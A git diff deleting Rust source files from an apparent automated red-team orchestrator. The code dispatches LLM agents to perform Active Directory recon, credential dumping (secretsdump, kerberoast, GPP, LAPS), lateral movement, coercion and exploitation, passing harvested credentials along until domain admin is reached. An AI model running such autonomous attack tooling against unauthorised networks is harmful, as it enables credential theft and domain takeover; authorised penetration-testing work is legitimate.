- let now = Utc::now(); - let mut task_params: HashMap = HashMap::new(); - if let Some(ref key) = cred_key { - task_params.insert("credential_key".to_string(), serde_json::json!(key)); - } - let task_info = ares_core::models::TaskInfo { - task_id: task_id.clone(), - task_type: task_type.to_string(), - assigned_agent: target_role.to_string(), - status: ares_core::models::TaskStatus::InProgress, - created_at: now, - started_at: Some(now), - completed_at: None, - last_activity_at: now, - params: task_params, - result: None, - error: None, - retry_count: 0, - max_retries: 3, - }; - let _ = self.state.track_pending_task(&self.queue, task_info).await; - - // Capture vuln_id from exploit payloads so it survives into the result. - let vuln_id_for_result = payload - .get("vuln_id") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()); - - // Spawn the LLM agent loop as a background task - let queue = self.queue.clone(); - let tid = task_id.clone(); - let tt = task_type.to_string(); - let cred_inflight = self.credential_inflight.clone(); - let cred_key_owned = cred_key.clone(); - tokio::spawn(async move { - let outcome = runner.execute_task(&tt, &tid, role, &payload).await; - - // Token usage is now recorded incrementally per-LLM-call via - // CallbackHandler::on_token_usage — no batch recording needed here. - - // Convert outcome to TaskResult and push to result queue - let mut result = match outcome { - Ok(outcome) => { - // Merge all structured discoveries from tool results - let merged_discoveries = if outcome.discoveries.is_empty() { - None - } else { - Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries)) - }; - - // Collect raw tool outputs for secondary regex extraction - let tool_outputs_json: Vec = outcome - .tool_outputs - .iter() - .map(|s| Value::String(s.clone())) - .collect(); - - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => { - // The result may be a JSON string (serialized object from - // the LLM) or plain text. If it parses as JSON, merge its - // fields into the result payload so extract_discoveries() - // can find any LLM-reported hosts/credentials. 
- let mut result_json = - if let Ok(parsed) = serde_json::from_str::(result) { - if parsed.is_object() { - let mut obj = parsed; - obj["steps"] = json!(outcome.steps); - obj["tool_calls"] = json!(outcome.tool_calls_dispatched); - obj - } else { - json!({ - "summary": result, - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }) - } - } else { - json!({ - "summary": result, - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }) - }; - // Overwrite "discoveries" with parser-extracted data only. - // The LLM's task_complete result is untrusted prose — - // any discovery-like keys it contains are ignored. - // Only ares-tools parsers (run on real tool stdout) - // produce authoritative discoveries. - if let Some(obj) = result_json.as_object_mut() { - obj.remove("discoveries"); - } - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: true, - result: Some(result_json), - error: None, - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::RequestAssistance { issue, context } => { - let mut result_json = json!({ - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: false, - result: Some(result_json), - error: Some(format!( - "Assistance needed: {issue} (context: {context})" - )), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::MaxSteps => { - let mut result_json = json!({ - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: false, - result: Some(result_json), - error: Some("Agent hit max steps limit".into()), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::EndTurn { content } => { - let mut result_json = json!({"summary": content}); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: true, - result: Some(result_json), - error: None, - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::MaxTokens => { - let mut result_json = json!({ - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }); - if let Some(disc) = merged_discoveries { - result_json["discoveries"] = disc; - } - if !tool_outputs_json.is_empty() { - result_json["tool_outputs"] = - Value::Array(tool_outputs_json.clone()); - } - TaskResult { - task_id: tid.clone(), - success: false, - result: Some(result_json), - error: Some("Agent hit max tokens".into()), - completed_at: Some(Utc::now()), - worker_pod: 
Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - } - } - LoopEndReason::Error(err) => TaskResult { - task_id: tid.clone(), - success: false, - result: None, - error: Some(err.clone()), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - }, - } - } - Err(e) => TaskResult { - task_id: tid.clone(), - success: false, - result: None, - error: Some(format!("LLM runner error: {e}")), - completed_at: Some(Utc::now()), - worker_pod: Some("rust-llm-runner".into()), - agent_name: Some(tt.clone()), - }, - }; - - // Inject vuln_id into result so process_completed_task can mark_exploited. - if let Some(ref vid) = vuln_id_for_result { - if let Some(ref mut res) = result.result { - if let Some(obj) = res.as_object_mut() { - obj.insert("vuln_id".to_string(), json!(vid)); - } - } - } - - // Release per-credential concurrency slot - if let Some(ref key) = cred_key_owned { - cred_inflight.release(key).await; - } - - // Push result to the normal result queue so the result consumer picks it up - if let Err(e) = queue.send_result(&tid, &result).await { - warn!( - task_id = %tid, - err = %e, - "Failed to push LLM task result to Redis" - ); - } - }); - - Ok(Some(task_id)) - } -} diff --git a/ares-orchestrator/src/dispatcher/task_builders.rs b/ares-orchestrator/src/dispatcher/task_builders.rs deleted file mode 100644 index 01afff2e..00000000 --- a/ares-orchestrator/src/dispatcher/task_builders.rs +++ /dev/null @@ -1,463 +0,0 @@ -//! Convenience methods for common task types (request_crack, request_recon, etc.). - -use anyhow::Result; -use serde_json::json; -use tracing::{debug, info}; - -use crate::state::DEDUP_SCANNED_TARGETS; - -use super::Dispatcher; - -impl Dispatcher { - /// Submit a crack task for a hash. - pub async fn request_crack(&self, hash: &ares_core::models::Hash) -> Result> { - let payload = json!({ - "hash_type": hash.hash_type, - "hash_value": hash.hash_value, - "username": hash.username, - "domain": hash.domain, - }); - // Crack tasks are non-LLM, normal priority - self.throttled_submit("crack", "cracker", payload, 5).await - } - - /// Submit a recon task. - /// - /// Guards (mirroring Python's `request_recon` in `routing.py`): - /// 1. Skip entirely if domain admin has been achieved - /// 2. Skip nmap tasks if all targets are already in `scanned_targets` - /// 3. 
Auto-dispatch nmap prerequisite before enumeration if targets not scanned - pub async fn request_recon( - &self, - target_ip: &str, - domain: &str, - techniques: &[&str], - credential: Option<&ares_core::models::Credential>, - ) -> Result> { - // Guard 1: Skip recon if domain admin already achieved - { - let state = self.state.read().await; - if state.has_domain_admin { - debug!( - target_ip = target_ip, - "Skipping recon — domain admin already achieved" - ); - return Ok(None); - } - } - - let is_nmap = techniques.contains(&"network_scan") || techniques.contains(&"nmap_scan"); - let is_smb_signing = techniques.contains(&"smb_signing_check"); - let is_scan_only = (is_nmap || is_smb_signing) - && techniques - .iter() - .all(|t| *t == "network_scan" || *t == "nmap_scan" || *t == "smb_signing_check"); - - // Guard 2: Skip nmap/scan tasks if target already scanned - if is_scan_only { - let state = self.state.read().await; - if state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) { - debug!( - target_ip = target_ip, - "Skipping scan — target already in scanned_targets" - ); - return Ok(None); - } - } - - // Guard 3: Auto-dispatch nmap prerequisite before enumeration - // If this is NOT a scan task and the target hasn't been scanned yet, - // dispatch an nmap scan first at priority 1 (urgent). - if !is_scan_only { - let needs_scan = { - let state = self.state.read().await; - !state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) - }; - if needs_scan { - info!( - target_ip = target_ip, - "Auto-dispatching nmap prerequisite before enumeration" - ); - let scan_payload = json!({ - "target_ip": target_ip, - "domain": domain, - "techniques": ["network_scan", "smb_signing_check"], - }); - // Priority 1 = urgent, scanned before the enumeration task - let _ = self - .throttled_submit("recon", "recon", scan_payload, 1) - .await; - } - } - - // Mark nmap targets as scanned (optimistic, to prevent duplicate dispatches) - if is_nmap { - { - let mut state = self.state.write().await; - state.mark_processed(DEDUP_SCANNED_TARGETS, target_ip.to_string()); - } - // Persist to Redis so it survives restarts - let _ = self - .state - .persist_dedup(&self.queue, DEDUP_SCANNED_TARGETS, target_ip) - .await; - } - - let mut payload = json!({ - "target_ip": target_ip, - "domain": domain, - "techniques": techniques, - }); - if let Some(cred) = credential { - payload["credential"] = json!({ - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }); - } - - // Nmap tasks get priority 1, other recon priority 5 - let priority = if is_nmap { 1 } else { 5 }; - self.throttled_submit("recon", "recon", payload, priority) - .await - } - - /// Submit a low-hanging fruit credential discovery task (SYSVOL, GPP, LDAP, LAPS). - /// - /// Mirrors Python's fast credential discovery dispatch: sends multiple high-success-rate - /// techniques in a single task so the LLM agent executes them sequentially. 
- pub async fn request_low_hanging_fruit( - &self, - target_ip: &str, - domain: &str, - credential: &ares_core::models::Credential, - priority: i32, - ) -> Result> { - let payload = json!({ - "techniques": [ - "sysvol_script_search", - "gpp_password_finder", - "ldap_search_descriptions", - "laps_dump" - ], - "reason": "low_hanging_fruit", - "target_ip": target_ip, - "domain": domain, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, priority) - .await - } - - /// Submit a credential access task (kerberoast, asrep, secretsdump, etc.). - pub async fn request_credential_access( - &self, - technique: &str, - target_ip: &str, - domain: &str, - credential: &ares_core::models::Credential, - priority: i32, - ) -> Result> { - let payload = json!({ - "technique": technique, - "target_ip": target_ip, - "domain": domain, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, priority) - .await - } - - /// Submit a secretsdump task. - pub async fn request_secretsdump( - &self, - target_ip: &str, - credential: &ares_core::models::Credential, - priority: i32, - ) -> Result> { - let payload = json!({ - "technique": "secretsdump", - "target_ip": target_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, priority) - .await - } - - /// Submit a lateral movement task. - pub async fn request_lateral( - &self, - target_ip: &str, - credential: &ares_core::models::Credential, - technique: &str, - ) -> Result> { - let payload = json!({ - "technique": technique, - "target_ip": target_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("lateral_movement", "lateral", payload, 5) - .await - } - - /// Submit an exploit task for a vulnerability. - /// - /// Looks up the best available credential or hash for the vuln's target/domain - /// and attaches it to the payload so the agent doesn't have to discover auth independently. 
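The lookup precedence the method below applies, reduced to a sketch over a simplified credential shape (type and helper are hypothetical; the real version also filters delegation accounts and attaches hashes):

struct Cred { username: String, domain: String }

fn pick<'a>(creds: &'a [Cred], account_name: Option<&str>, domain: &str) -> Option<&'a Cred> {
    // 1. An exact account-name match from the vuln details wins.
    account_name
        .and_then(|a| creds.iter().find(|c| c.username.eq_ignore_ascii_case(a)))
        // 2. Otherwise any credential for the vuln's domain.
        .or_else(|| {
            (!domain.is_empty())
                .then(|| creds.iter().find(|c| c.domain.eq_ignore_ascii_case(domain)))
                .flatten()
        })
        // 3. Otherwise the first available credential.
        .or_else(|| creds.first())
}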
- pub async fn request_exploit( - &self, - vuln: &ares_core::models::VulnerabilityInfo, - priority: i32, - ) -> Result> { - let mut payload = json!({ - "vuln_id": vuln.vuln_id, - "vuln_type": vuln.vuln_type, - "target": vuln.target, - "details": vuln.details, - }); - - // Look up credentials for this exploit from state - { - let state = self.state.read().await; - - // Try account_name from vuln details first, then fall back to any cred for the target domain - let account_name = vuln - .details - .get("account_name") - .and_then(|v| v.as_str()) - .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())); - - let domain = vuln - .details - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or(""); - - // Try to find a matching credential - let cred = if let Some(acct) = account_name { - state - .credentials - .iter() - .find(|c| c.username.to_lowercase() == acct.to_lowercase()) - } else { - None - } - .or_else(|| { - // Fall back to any non-delegation credential for the vuln's domain - if !domain.is_empty() { - state.credentials.iter().find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !state.is_delegation_account(&c.username) - }) - } else { - // Fall back to first available non-delegation credential - state - .credentials - .iter() - .find(|c| !state.is_delegation_account(&c.username)) - } - }); - - if let Some(cred) = cred { - payload["credential"] = json!({ - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }); - } - - // For MSSQL vulns, include ALL available credentials for the domain - // so the LLM can try each one (different users have different MSSQL - // permissions — e.g. sam.wilson can EXECUTE AS LOGIN = 'sa'). - if vuln.vuln_type.starts_with("mssql") && !domain.is_empty() { - let all_creds: Vec<_> = state - .credentials - .iter() - .filter(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !state.is_delegation_account(&c.username) - }) - .map(|c| { - json!({ - "username": c.username, - "password": c.password, - "domain": c.domain, - }) - }) - .collect(); - if all_creds.len() > 1 { - payload["all_credentials"] = json!(all_creds); - } - } - - // Also attach a hash if available for the account - if let Some(acct) = account_name { - if let Some(hash) = state - .hashes - .iter() - .find(|h| h.username.to_lowercase() == acct.to_lowercase()) - { - payload["hash"] = json!(hash.hash_value); - payload["hash_username"] = json!(hash.username); - if let Some(ref aes) = hash.aes_key { - payload["aes_key"] = json!(aes); - } - } - } - } - - let role = if vuln.recommended_agent.is_empty() { - "privesc" - } else { - &vuln.recommended_agent - }; - self.throttled_submit("exploit", role, payload, priority) - .await - } - - /// Submit a BloodHound collection task. - pub async fn request_bloodhound( - &self, - domain: &str, - dc_ip: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "bloodhound_collect", - "domain": domain, - "target_ip": dc_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("recon", "recon", payload, 7).await - } - - /// Submit a delegation enumeration task. 
- pub async fn request_delegation_enum( - &self, - domain: &str, - dc_ip: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "find_delegation", - "domain": domain, - "target_ip": dc_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("privesc_enumeration", "recon", payload, 5) - .await - } - - /// Submit a share enumeration task against a host using credentials. - pub async fn request_share_enumeration( - &self, - host_ip: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "techniques": ["enumerate_shares"], - "target_ip": host_ip, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("recon", "recon", payload, 5).await - } - - /// Submit a share spider task. - pub async fn request_share_spider( - &self, - host_ip: &str, - share_name: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "share_spider", - "target_ip": host_ip, - "share_name": share_name, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("credential_access", "credential_access", payload, 8) - .await - } - - /// Submit a coercion task. - pub async fn request_coercion( - &self, - target_ip: &str, - listener_ip: &str, - techniques: &[&str], - ) -> Result> { - let payload = json!({ - "target_ip": target_ip, - "listener_ip": listener_ip, - "techniques": techniques, - }); - self.throttled_submit("coercion", "coercion", payload, 3) - .await - } - - /// Submit a CERTIPY find task for ADCS enumeration. - pub async fn request_certipy_find( - &self, - target_ip: &str, - domain: &str, - credential: &ares_core::models::Credential, - ) -> Result> { - let payload = json!({ - "technique": "certipy_find", - "target_ip": target_ip, - "domain": domain, - "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, - }, - }); - self.throttled_submit("recon", "recon", payload, 4).await - } - - /// Refresh the operation lock TTL. Called periodically. - pub async fn extend_lock(&self) -> Result<()> { - let op_id = self.state.operation_id().await; - self.queue.extend_lock(&op_id, self.config.lock_ttl).await?; - Ok(()) - } - - /// Publish a state update notification via Redis PubSub. - pub async fn notify_state_update(&self) -> Result<()> { - let op_id = self.state.operation_id().await; - self.queue.publish_state_update(&op_id).await?; - Ok(()) - } -} diff --git a/ares-orchestrator/src/exploitation.rs b/ares-orchestrator/src/exploitation.rs deleted file mode 100644 index e56eab30..00000000 --- a/ares-orchestrator/src/exploitation.rs +++ /dev/null @@ -1,196 +0,0 @@ -//! Exploitation workflow — semaphore-gated exploit dispatch. -//! -//! Mirrors the Python `exploitation_workflow` background task that dequeues -//! vulnerabilities from a Redis ZSET and dispatches exploit tasks with -//! concurrency limited to 3 simultaneous exploits. 
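The gating pattern this file implements, as a self-contained sketch (exploit body elided; how many acquires succeed before the first release depends on scheduling):

use std::sync::Arc;
use tokio::sync::Semaphore;

#[tokio::main]
async fn main() {
    // Three permits cap the number of in-flight exploits.
    let semaphore = Arc::new(Semaphore::new(3));
    for i in 0..5 {
        match semaphore.clone().try_acquire_owned() {
            Ok(permit) => {
                tokio::spawn(async move {
                    let _permit = permit; // held until the task finishes
                    // ... dispatch one exploit here ...
                });
            }
            Err(_) => println!("vuln {i}: no free permit, would be re-enqueued"),
        }
    }
}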
- -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use redis::AsyncCommands; -use tokio::sync::{watch, Semaphore}; -use tokio::time::Instant; -use tracing::{debug, info, warn}; - -use ares_core::models::VulnerabilityInfo; - -use crate::dispatcher::Dispatcher; - -/// Cooldown before re-dispatching a failed exploit for the same vulnerability. -const EXPLOIT_RETRY_COOLDOWN: Duration = Duration::from_secs(120); - -/// Maximum concurrent exploit tasks. -const MAX_CONCURRENT_EXPLOITS: usize = 3; - -/// Spawn the exploitation workflow background task. -/// -/// Continuously pops vulnerabilities from the priority ZSET and dispatches -/// exploit tasks, respecting a semaphore limit. -pub async fn exploitation_workflow( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let semaphore = Arc::new(Semaphore::new(MAX_CONCURRENT_EXPLOITS)); - let mut interval = tokio::time::interval(Duration::from_secs(5)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - // Track dispatch times locally to allow retry after cooldown. - // Unlike `exploited_vulnerabilities` (permanent), this only prevents - // rapid re-dispatch within the same session. - let mut dispatched_at: HashMap = HashMap::new(); - - info!("Exploitation workflow started (max concurrent: {MAX_CONCURRENT_EXPLOITS})"); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Check if we have domain admin — stop exploiting once achieved - { - let state = dispatcher.state.read().await; - if state.has_domain_admin { - debug!("Domain admin achieved — exploitation workflow idle"); - continue; - } - } - - // Try to pop the highest-priority vuln from the ZSET - match pop_next_vuln(&dispatcher).await { - Ok(Some(vuln)) => { - // Skip delegation vulns — s4u.rs handles these with proper - // credential checking and lockout-aware dispatch. The generic - // exploitation path falls back to wrong credentials and - // produces LLM errors with missing target_spn. 
- { - let vtype = vuln.vuln_type.to_lowercase(); - if vtype == "constrained_delegation" - || vtype == "unconstrained_delegation" - || vtype == "rbcd" - { - debug!( - vuln_id = %vuln.vuln_id, - vuln_type = %vuln.vuln_type, - "Skipping delegation vuln (handled by s4u automation)" - ); - continue; - } - } - - // Check if permanently marked exploited (set by result processing on success) - { - let state = dispatcher.state.read().await; - if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { - debug!(vuln_id = %vuln.vuln_id, "Already exploited, skipping"); - continue; - } - } - - // Check dispatch cooldown to prevent rapid re-dispatch - if let Some(last) = dispatched_at.get(&vuln.vuln_id) { - if last.elapsed() < EXPLOIT_RETRY_COOLDOWN { - // Still in cooldown — re-enqueue for later - let _ = requeue_vuln(&dispatcher, &vuln).await; - continue; - } - } - - // Acquire semaphore permit - let permit = match semaphore.clone().try_acquire_owned() { - Ok(p) => p, - Err(_) => { - // At capacity — re-enqueue and wait - let _ = requeue_vuln(&dispatcher, &vuln).await; - debug!("Exploit semaphore full, waiting"); - tokio::time::sleep(Duration::from_secs(2)).await; - continue; - } - }; - - let vuln_id = vuln.vuln_id.clone(); - let vuln_type = vuln.vuln_type.clone(); - let disp = dispatcher.clone(); - - // Record dispatch time for cooldown tracking - dispatched_at.insert(vuln_id.clone(), Instant::now()); - - // Spawn exploit task (does not block the main loop) - tokio::spawn(async move { - let _permit = permit; // held until this task completes - - match disp.request_exploit(&vuln, vuln.priority).await { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - vuln_id = %vuln_id, - vuln_type = %vuln_type, - "Exploit dispatched" - ); - // Re-enqueue with lower priority so the vuln survives - // task failures. The cooldown timer prevents immediate - // re-dispatch, and mark_exploited (called on success in - // result_processing) prevents re-dispatch after success. - let mut retry_vuln = vuln.clone(); - retry_vuln.priority = (vuln.priority + 2).min(10); - let _ = requeue_vuln(&disp, &retry_vuln).await; - } - Ok(None) => { - debug!(vuln_id = %vuln_id, "Exploit deferred by throttler"); - // Re-enqueue for later - let _ = requeue_vuln(&disp, &vuln).await; - } - Err(e) => { - warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch exploit"); - let _ = requeue_vuln(&disp, &vuln).await; - } - } - }); - } - Ok(None) => { - // No vulns in queue - } - Err(e) => { - warn!(err = %e, "Failed to pop vulnerability from queue"); - } - } - } -} - -/// Pop the lowest-score (highest-priority) vulnerability from the ZSET. -async fn pop_next_vuln(dispatcher: &Dispatcher) -> Result<Option<VulnerabilityInfo>> { - let key = dispatcher.state.vuln_queue_key().await; - let mut conn = dispatcher.queue.connection(); - - // ZPOPMIN returns the member with the lowest score - let result: Vec<(String, f64)> = redis::cmd("ZPOPMIN") - .arg(&key) - .arg(1) - .query_async(&mut conn) - .await - .unwrap_or_default(); - - match result.into_iter().next() { - Some((json, _score)) => { - let vuln: VulnerabilityInfo = - serde_json::from_str(&json).map_err(|e| anyhow::anyhow!("Bad vuln JSON: {e}"))?; - Ok(Some(vuln)) - } - None => Ok(None), - } -} - -/// Re-enqueue a vulnerability into the ZSET (e.g., after throttle rejection).
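-/// The member is the JSON-serialized vuln and the score is its priority, so
-/// re-enqueueing a clone with a bumped priority (as the dispatch path above
-/// does) simply demotes it behind more urgent entries.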
-async fn requeue_vuln(dispatcher: &Dispatcher, vuln: &VulnerabilityInfo) -> Result<()> { - let key = dispatcher.state.vuln_queue_key().await; - let mut conn = dispatcher.queue.connection(); - let json = serde_json::to_string(vuln)?; - let score = vuln.priority as f64; - let _: () = conn.zadd(&key, &json, score).await?; - Ok(()) -} diff --git a/ares-orchestrator/src/llm_runner.rs b/ares-orchestrator/src/llm_runner.rs deleted file mode 100644 index 2de2f224..00000000 --- a/ares-orchestrator/src/llm_runner.rs +++ /dev/null @@ -1,372 +0,0 @@ -//! LLM task runner — drives tasks through the Rust agent loop. -//! -//! Replaces the Python dreadnode Agent for LLM-driven tasks. -//! The runner builds prompts, calls the LLM, dispatches tool calls to -//! Python workers via Redis, and handles callbacks in Rust. - -use std::sync::{Arc, OnceLock}; - -use anyhow::Result; -use tracing::{debug, info, warn}; - -use ares_llm::prompt::templates; -use ares_llm::prompt::StateSnapshot; -use ares_llm::tool_registry::{self, AgentRole}; -use ares_llm::{ - run_agent_loop, AgentLoopConfig, AgentLoopOutcome, CallbackHandler, LlmProvider, LoopEndReason, - ToolDispatcher, -}; - -use crate::state::SharedState; - -// --------------------------------------------------------------------------- -// LLM task runner -// --------------------------------------------------------------------------- - -/// Drives LLM-powered tasks through the Rust agent loop. -/// -/// Owns an LLM provider and tool dispatcher, and builds prompts from -/// the current operation state. -#[allow(dead_code)] -pub struct LlmTaskRunner { - provider: Box<dyn LlmProvider>, - model_name: String, - dispatcher: Arc<dyn ToolDispatcher>, - state: SharedState, - config: AgentLoopConfig, - /// Deferred callback handler — set after construction to break the - /// `LlmTaskRunner → Dispatcher → LlmTaskRunner` circular dependency. - callback_handler: OnceLock<Arc<dyn CallbackHandler>>, -} - -impl LlmTaskRunner { - pub fn new( - provider: Box<dyn LlmProvider>, - model_name: String, - dispatcher: Arc<dyn ToolDispatcher>, - state: SharedState, - ) -> Self { - let config = AgentLoopConfig { - model: model_name.clone(), - ..AgentLoopConfig::default() - }; - Self { - provider, - model_name, - dispatcher, - state, - config, - callback_handler: OnceLock::new(), - } - } - - /// Set the callback handler after construction. - /// - /// This is safe to call from `&self` (interior mutability via `OnceLock`), - /// which lets us break the circular dependency: the handler needs the - /// `Dispatcher`, which itself holds an `Arc<LlmTaskRunner>`. - pub fn set_callback_handler(&self, handler: Arc<dyn CallbackHandler>) { - let _ = self.callback_handler.set(handler); - } - - /// Execute a task through the LLM agent loop. - /// - /// This is the main entry point called by the orchestrator when - /// a task should be driven by the LLM rather than pushed to a - /// Python worker's full agent loop. - pub async fn execute_task( - &self, - task_type: &str, - task_id: &str, - role: AgentRole, - payload: &serde_json::Value, - ) -> Result<AgentLoopOutcome> { - let role_str = role.as_str(); - - // 1. Snapshot state (releases RwLock before LLM calls) - let snapshot = self.state.snapshot().await; - - // 2. Build system prompt from agent template - let system_prompt = build_system_prompt(role, &snapshot)?; - - // 3. Build task prompt from Tera template + payload - let task_prompt = build_task_prompt(task_type, task_id, payload, &snapshot)?; - - // 4.
Get tool schemas for this role - let tools = tool_registry::tools_for_role(role); - - info!( - task_id = task_id, - task_type = task_type, - role = role_str, - tools = tools.len(), - "Starting LLM agent loop" - ); - - // 5. Run the agent loop - let outcome = run_agent_loop( - self.provider.as_ref(), - Arc::clone(&self.dispatcher), - &self.config, - &system_prompt, - &task_prompt, - role_str, - task_id, - &tools, - self.callback_handler.get().cloned(), - ) - .await; - - log_outcome(task_id, &outcome); - - Ok(outcome) - } -} - -// --------------------------------------------------------------------------- -// Prompt building helpers -// --------------------------------------------------------------------------- - -/// Build the system prompt for a given agent role. -fn build_system_prompt(role: AgentRole, snapshot: &StateSnapshot) -> Result<String> { - // Get capabilities from the tool definitions for this role - let tools = tool_registry::tools_for_role(role); - let capabilities: Vec<String> = tools - .iter() - .filter(|t| !tool_registry::is_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - let template_name = match role { - AgentRole::Recon => templates::TEMPLATE_RECON, - AgentRole::CredentialAccess => templates::TEMPLATE_CREDENTIAL_ACCESS, - AgentRole::Cracker => templates::TEMPLATE_CRACKER, - AgentRole::Acl => templates::TEMPLATE_ACL, - AgentRole::Privesc => templates::TEMPLATE_PRIVESC, - AgentRole::Lateral => templates::TEMPLATE_LATERAL, - AgentRole::Coercion => templates::TEMPLATE_COERCION, - AgentRole::Orchestrator => templates::TEMPLATE_ORCHESTRATOR, - }; - - // Render system instructions (no per-role capability map for now) - let system_instructions = templates::render_system_instructions(None)?; - - // Render agent-specific instructions - let agent_instructions = templates::render_agent_instructions( - template_name, - &capabilities, - false, - &snapshot.undominated_forests, - )?; - - Ok(format!("{system_instructions}\n\n{agent_instructions}")) -} - -/// Build the task-specific prompt from payload and state. -fn build_task_prompt( - task_type: &str, - task_id: &str, - payload: &serde_json::Value, - snapshot: &StateSnapshot, -) -> Result<String> { - // Use the PromptBuilder from ares-llm - let prompt = - ares_llm::prompt::generate_task_prompt(task_type, task_id, payload, Some(snapshot)); - - match prompt { - Some(p) => Ok(p), - None => { - warn!( - task_type = task_type, - task_id = task_id, - "No prompt template for task type, using raw payload" - ); - Ok(format!( - "## Task: {task_id}\n\nType: {task_type}\n\nPayload:\n```json\n{}\n```\n\nComplete this task and call `task_complete` with results.", - serde_json::to_string_pretty(payload).unwrap_or_default() - )) - } - } -} - -/// Map task type string to AgentRole.
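-/// Several task types share one role (e.g. "recon" and "nmap" both map to
-/// `AgentRole::Recon`); unknown types return `None` so the caller decides
-/// how to route them.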
-pub fn role_for_task_type(task_type: &str) -> Option<AgentRole> { - match task_type { - "recon" | "nmap" | "bloodhound" | "delegation_enum" | "certipy_find" => { - Some(AgentRole::Recon) - } - "credential_access" | "secretsdump" | "share_spider" | "kerberoast" | "asrep_roast" - | "password_spray" => Some(AgentRole::CredentialAccess), - "crack" => Some(AgentRole::Cracker), - "lateral" | "lateral_movement" => Some(AgentRole::Lateral), - "exploit" | "privesc_enumeration" => Some(AgentRole::Privesc), - "coercion" => Some(AgentRole::Coercion), - "acl_analysis" => Some(AgentRole::Acl), - "command" => None, // Command tasks go to whatever role is specified - _ => None, - } -} - -// --------------------------------------------------------------------------- -// Logging -// --------------------------------------------------------------------------- - -fn log_outcome(task_id: &str, outcome: &AgentLoopOutcome) { - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => { - info!( - task_id = task_id, - steps = outcome.steps, - tool_calls = outcome.tool_calls_dispatched, - input_tokens = outcome.total_usage.input_tokens, - output_tokens = outcome.total_usage.output_tokens, - "Task completed via LLM: {result}" - ); - } - LoopEndReason::RequestAssistance { issue, .. } => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent requested assistance: {issue}" - ); - } - LoopEndReason::MaxSteps => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent hit max steps limit" - ); - } - LoopEndReason::EndTurn { content } => { - debug!( - task_id = task_id, - steps = outcome.steps, - "LLM agent ended turn: {content}" - ); - } - LoopEndReason::MaxTokens => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent hit max tokens" - ); - } - LoopEndReason::Error(err) => { - warn!( - task_id = task_id, - steps = outcome.steps, - "LLM agent loop error: {err}" - ); - } - } -} - 